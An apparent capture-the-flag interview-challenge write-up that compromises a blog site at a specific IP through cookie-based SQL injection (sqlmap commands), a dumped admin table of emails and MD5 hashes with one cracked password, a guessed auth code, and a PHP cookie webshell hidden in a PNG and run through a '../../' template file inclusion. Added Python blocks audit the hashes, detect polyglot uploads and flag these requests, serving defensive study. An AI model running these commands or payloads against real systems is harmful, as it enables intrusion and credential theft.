True lack of freedom is building a cage in your own heart.

Notes on a practical challenge from a company interview

A friend had an interview and was sent a practical challenge; I found the same challenge on the public internet, so I am recording it here.

Open the challenge link.

Clicking through to the about page gives some hints.

It says that directory scanning is needed; running dirsearch against the site turns up a few files.

Access robots.txt to check whether it discloses anything sensitive.

It points to /1234, but that path returns a 404.

This public copy of the site has a different robots.txt; from the robots.txt on the target machine used in my friend's interview, the entry is known to be Company_admin/login.php, which is the site's admin backend.

The backend login asks for an email, a password and a four-digit authentication code. A quick brute-force attempt shows that the captcha on this page changes on every refresh, so brute-forcing the form is not feasible.

The about.php page of the interview target machine also hints at "sqli", i.e. SQL injection, so the site evidently has a SQL injection vulnerability somewhere.

Clicking a blog entry on the homepage shows an id parameter; test it for SQL injection.

There is a hint here: "about my password".

Running sqlmap directly against the URL parameter does not retrieve anything.

Further testing shows that the injection point is in the cookie.

3 and 4.

Run sqlmap directly against the cookie (--level 2 is what makes sqlmap test the Cookie header at all):

sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables

There are five tables.

Read the columns of the admin table:

sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin --columns

When sqlmap tries to dump the fields of the admin table it keeps throwing errors, so manual injection is used here instead.

Five accounts are obtained:

2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e

The plaintext of [email protected] is asdqwe123.
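The dump above is unsalted MD5: two accounts share the exact same hash (so they share a password), and the hashes of common passwords can be looked up directly. The following is an added example, not code from the original post, showing the two audit checks a defender would run over such a dump and the per-user-salted scrypt storage that prevents both problems. The dump dictionary is taken from the four lines on the page; the wordlist is a small constructed stand-in for a real denylist.

```python
import hashlib
import hmac
import os

# Taken from the dump on the page: email -> unsalted MD5 hex.
DUMPED = {
    "fakeaddr@gmail.com": "e69dc2c09e8da6259422d987ccbe95b5",
    "123@qq.com": "fcea920f7412b5da7be0cf42b8c93759",
    "qwe@gmail.com": "fcea920f7412b5da7be0cf42b8c93759",
    "qian@gmail.com": "e10adc3949ba59abbe56e057f20f883e",
}

# Constructed stand-in for a common-password denylist.
COMMON = ["password", "123456", "12345678", "qwerty", "asdqwe123"]


def shared_hashes(dump):
    """Group accounts whose stored hash is identical.

    With unsalted hashing an identical hash means an identical password,
    so one cracked account immediately exposes the others in the group.
    """
    by_hash = {}
    for email, h in dump.items():
        by_hash.setdefault(h, []).append(email)
    return {h: emails for h, emails in by_hash.items() if len(emails) > 1}


def weak_unsalted(dump, wordlist):
    """Return accounts whose unsalted MD5 equals the MD5 of a denylisted password."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {email: table[h] for email, h in dump.items() if h in table}


def store_password(password, salt=None):
    """Salted, memory-hard hash: same password -> different stored values."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), n=2**14, r=8, p=1)
    # Constant-time comparison so the check does not leak via timing.
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("shared hashes:", shared_hashes(DUMPED))
    print("denylisted passwords:", weak_unsalted(DUMPED, COMMON))
    stored = store_password("123456")
    print("scrypt record:", stored)
    print("verify ok:", verify_password("123456", stored))
```

The two `store_password` calls for the same password produce different records because of the random salt, which is exactly what makes the `shared_hashes` and lookup-table checks useless against a properly stored database.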

Now only the four-digit authentication code remains. Brute-forcing is not possible, but the about page gives a hint: it mentions "some social engineering".

The blog section of the interview target machine has two articles, one of which is the author wishing themselves a happy birthday, and it gives the date 2019-10-27.

Trying that, 1027 logs in successfully.

After logging in, the admin interface is displayed.

The Blog > create post section has an upload point; testing shows it uses a whitelist that only allows image file extensions.

Check whether there is a file inclusion vulnerability; if so, a webshell embedded in an image can be included directly and used to execute commands.

In the access > language section there is a very familiar-looking parameter, "?template=".

Direct file inclusion works, so prepare an image shell.

Create a PHP file and a PNG file, then append the PHP file to the image:

cat 1.php >> 1.png

Testing shows that a webshell uploaded to this target machine cannot be reached through GET or POST parameters; as with the SQL injection, it only works through a cookie, which is then used to execute commands.

First, prepare the following webshell file.

<?php system($_COOKIE['a']);?>

Then build the image shell with the method above.
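The upload whitelist on this site only looks at the extension, which is why `cat 1.php >> 1.png` passes it: the result still starts with a valid PNG. The following is an added example, not code from the original post, showing the checks that would have caught it on the server side. It builds a minimal valid PNG in memory (constructed here), walks its chunks to find where the image really ends, and flags both trailing data after IEND and a PHP open tag anywhere in the body; the allowlist of extensions is an assumption standing in for the site's own.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}  # assumed allowlist
# The webshell from the post, appended the same way `cat 1.php >> 1.png` does.
WEBSHELL = b"<?php system($_COOKIE['a']);?>"


def _chunk(ctype, body):
    """PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_minimal_png():
    """A valid 1x1 RGB PNG, constructed here so the example runs offline."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")      # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def png_payload_end(data):
    """Walk the chunk list; return the offset just past IEND, or None if malformed."""
    if not data.startswith(PNG_SIGNATURE):
        return None
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(data):
            return None
        crc = struct.unpack(">I", data[end - 4:end])[0]
        if crc != zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF:
            return None
        pos = end
        if ctype == b"IEND":
            return pos
    return None


def inspect_upload(filename, data):
    """Return a list of reasons to reject the upload; empty means it looks clean."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        findings.append("extension not in allowlist")
    end = png_payload_end(data)
    if end is None:
        findings.append("not a well-formed PNG")
    elif end < len(data):
        findings.append(f"{len(data) - end} bytes of trailing data after IEND")
    if PHP_TAG.search(data):
        findings.append("PHP open tag found in file body")
    return findings


if __name__ == "__main__":
    clean = make_minimal_png()
    polyglot = clean + WEBSHELL
    print("clean:", inspect_upload("1.png", clean))
    print("polyglot:", inspect_upload("1.png", polyglot))
```

The extension check alone accepts the polyglot; the chunk walk rejects it because 30 bytes follow IEND, and the tag scan rejects it independently. The more robust server-side fix is to re-encode every upload with an image library, which drops anything after the image data regardless of format tricks.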

Go back to the blog creation page and upload the image shell.

The address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.

File inclusion URL: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png
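Both weaknesses used on this target sit in places many request filters skip: the SQL injection lives in the `id` cookie (sqlmap only tests cookies from `--level 2`), and the inclusion lives in a `template` value that should only ever be a short name. The following is an added example, not code from the original post, showing detection logic a defender could run over request records for exactly these two spots: the `id` cookie must be a plain integer, and `template` must be a bare name from a known set. The request records and the set of template names (`en`, `zh`) are constructed assumptions; the site's real template names are not shown on the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ALLOWED_TEMPLATES = {"en", "zh"}  # assumed; the page only shows the parameter name
TEMPLATE_NAME = re.compile(r"[A-Za-z0-9_-]+")
# Cheap indicators for other cookies that should never carry SQL syntax.
SQLI_HINTS = re.compile(r"""['"]|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(""",
                        re.IGNORECASE)


def parse_cookie(header):
    """Minimal Cookie header parser that tolerates odd characters in values."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.split("=", 1)
            pairs[name.strip()] = value.strip()
    return pairs


def analyse_request(req):
    """Return (kind, location, value) alerts for one request record."""
    alerts = []
    query = parse_qs(urlsplit(req["url"]).query, keep_blank_values=True)
    for value in query.get("template", []):
        value = unquote(value)  # second decode catches double-encoded traversal
        if not TEMPLATE_NAME.fullmatch(value) or value not in ALLOWED_TEMPLATES:
            alerts.append(("lfi", "query:template", value))
    for name, value in parse_cookie(req.get("cookie", "")).items():
        value = unquote(value)
        if name == "id" and not value.isdigit():
            alerts.append(("sqli", "cookie:id", value))
        elif name != "id" and SQLI_HINTS.search(value):
            alerts.append(("sqli", f"cookie:{name}", value))
    return alerts


def scan(requests):
    """Run analyse_request over a batch; returns (index, alert) pairs."""
    return [(i, alert) for i, req in enumerate(requests) for alert in analyse_request(req)]


# Constructed request records modelled on the traffic described in the post.
REQUESTS = [
    {"url": "/Company_admin/language.php?template=en", "cookie": "id=6; PHPSESSID=abc123"},
    {"url": "/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png",
     "cookie": "id=6"},
    {"url": "/single.php", "cookie": "id=6' AND 1=1-- -"},
    {"url": "/single.php", "cookie": "id=6"},
]

if __name__ == "__main__":
    for index, alert in scan(REQUESTS):
        print(index, alert)
```

Records 0 and 3 are clean; record 1 trips the template check because the value is neither a bare name nor in the allowed set, and record 2 trips the cookie check because `id` is not an integer. The same allowlist logic, applied in the application before `include`, is the actual fix for the `template` parameter.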

Capture this request with Burp and execute commands via the cookie.

Start looking for the flag.

The flag is found.
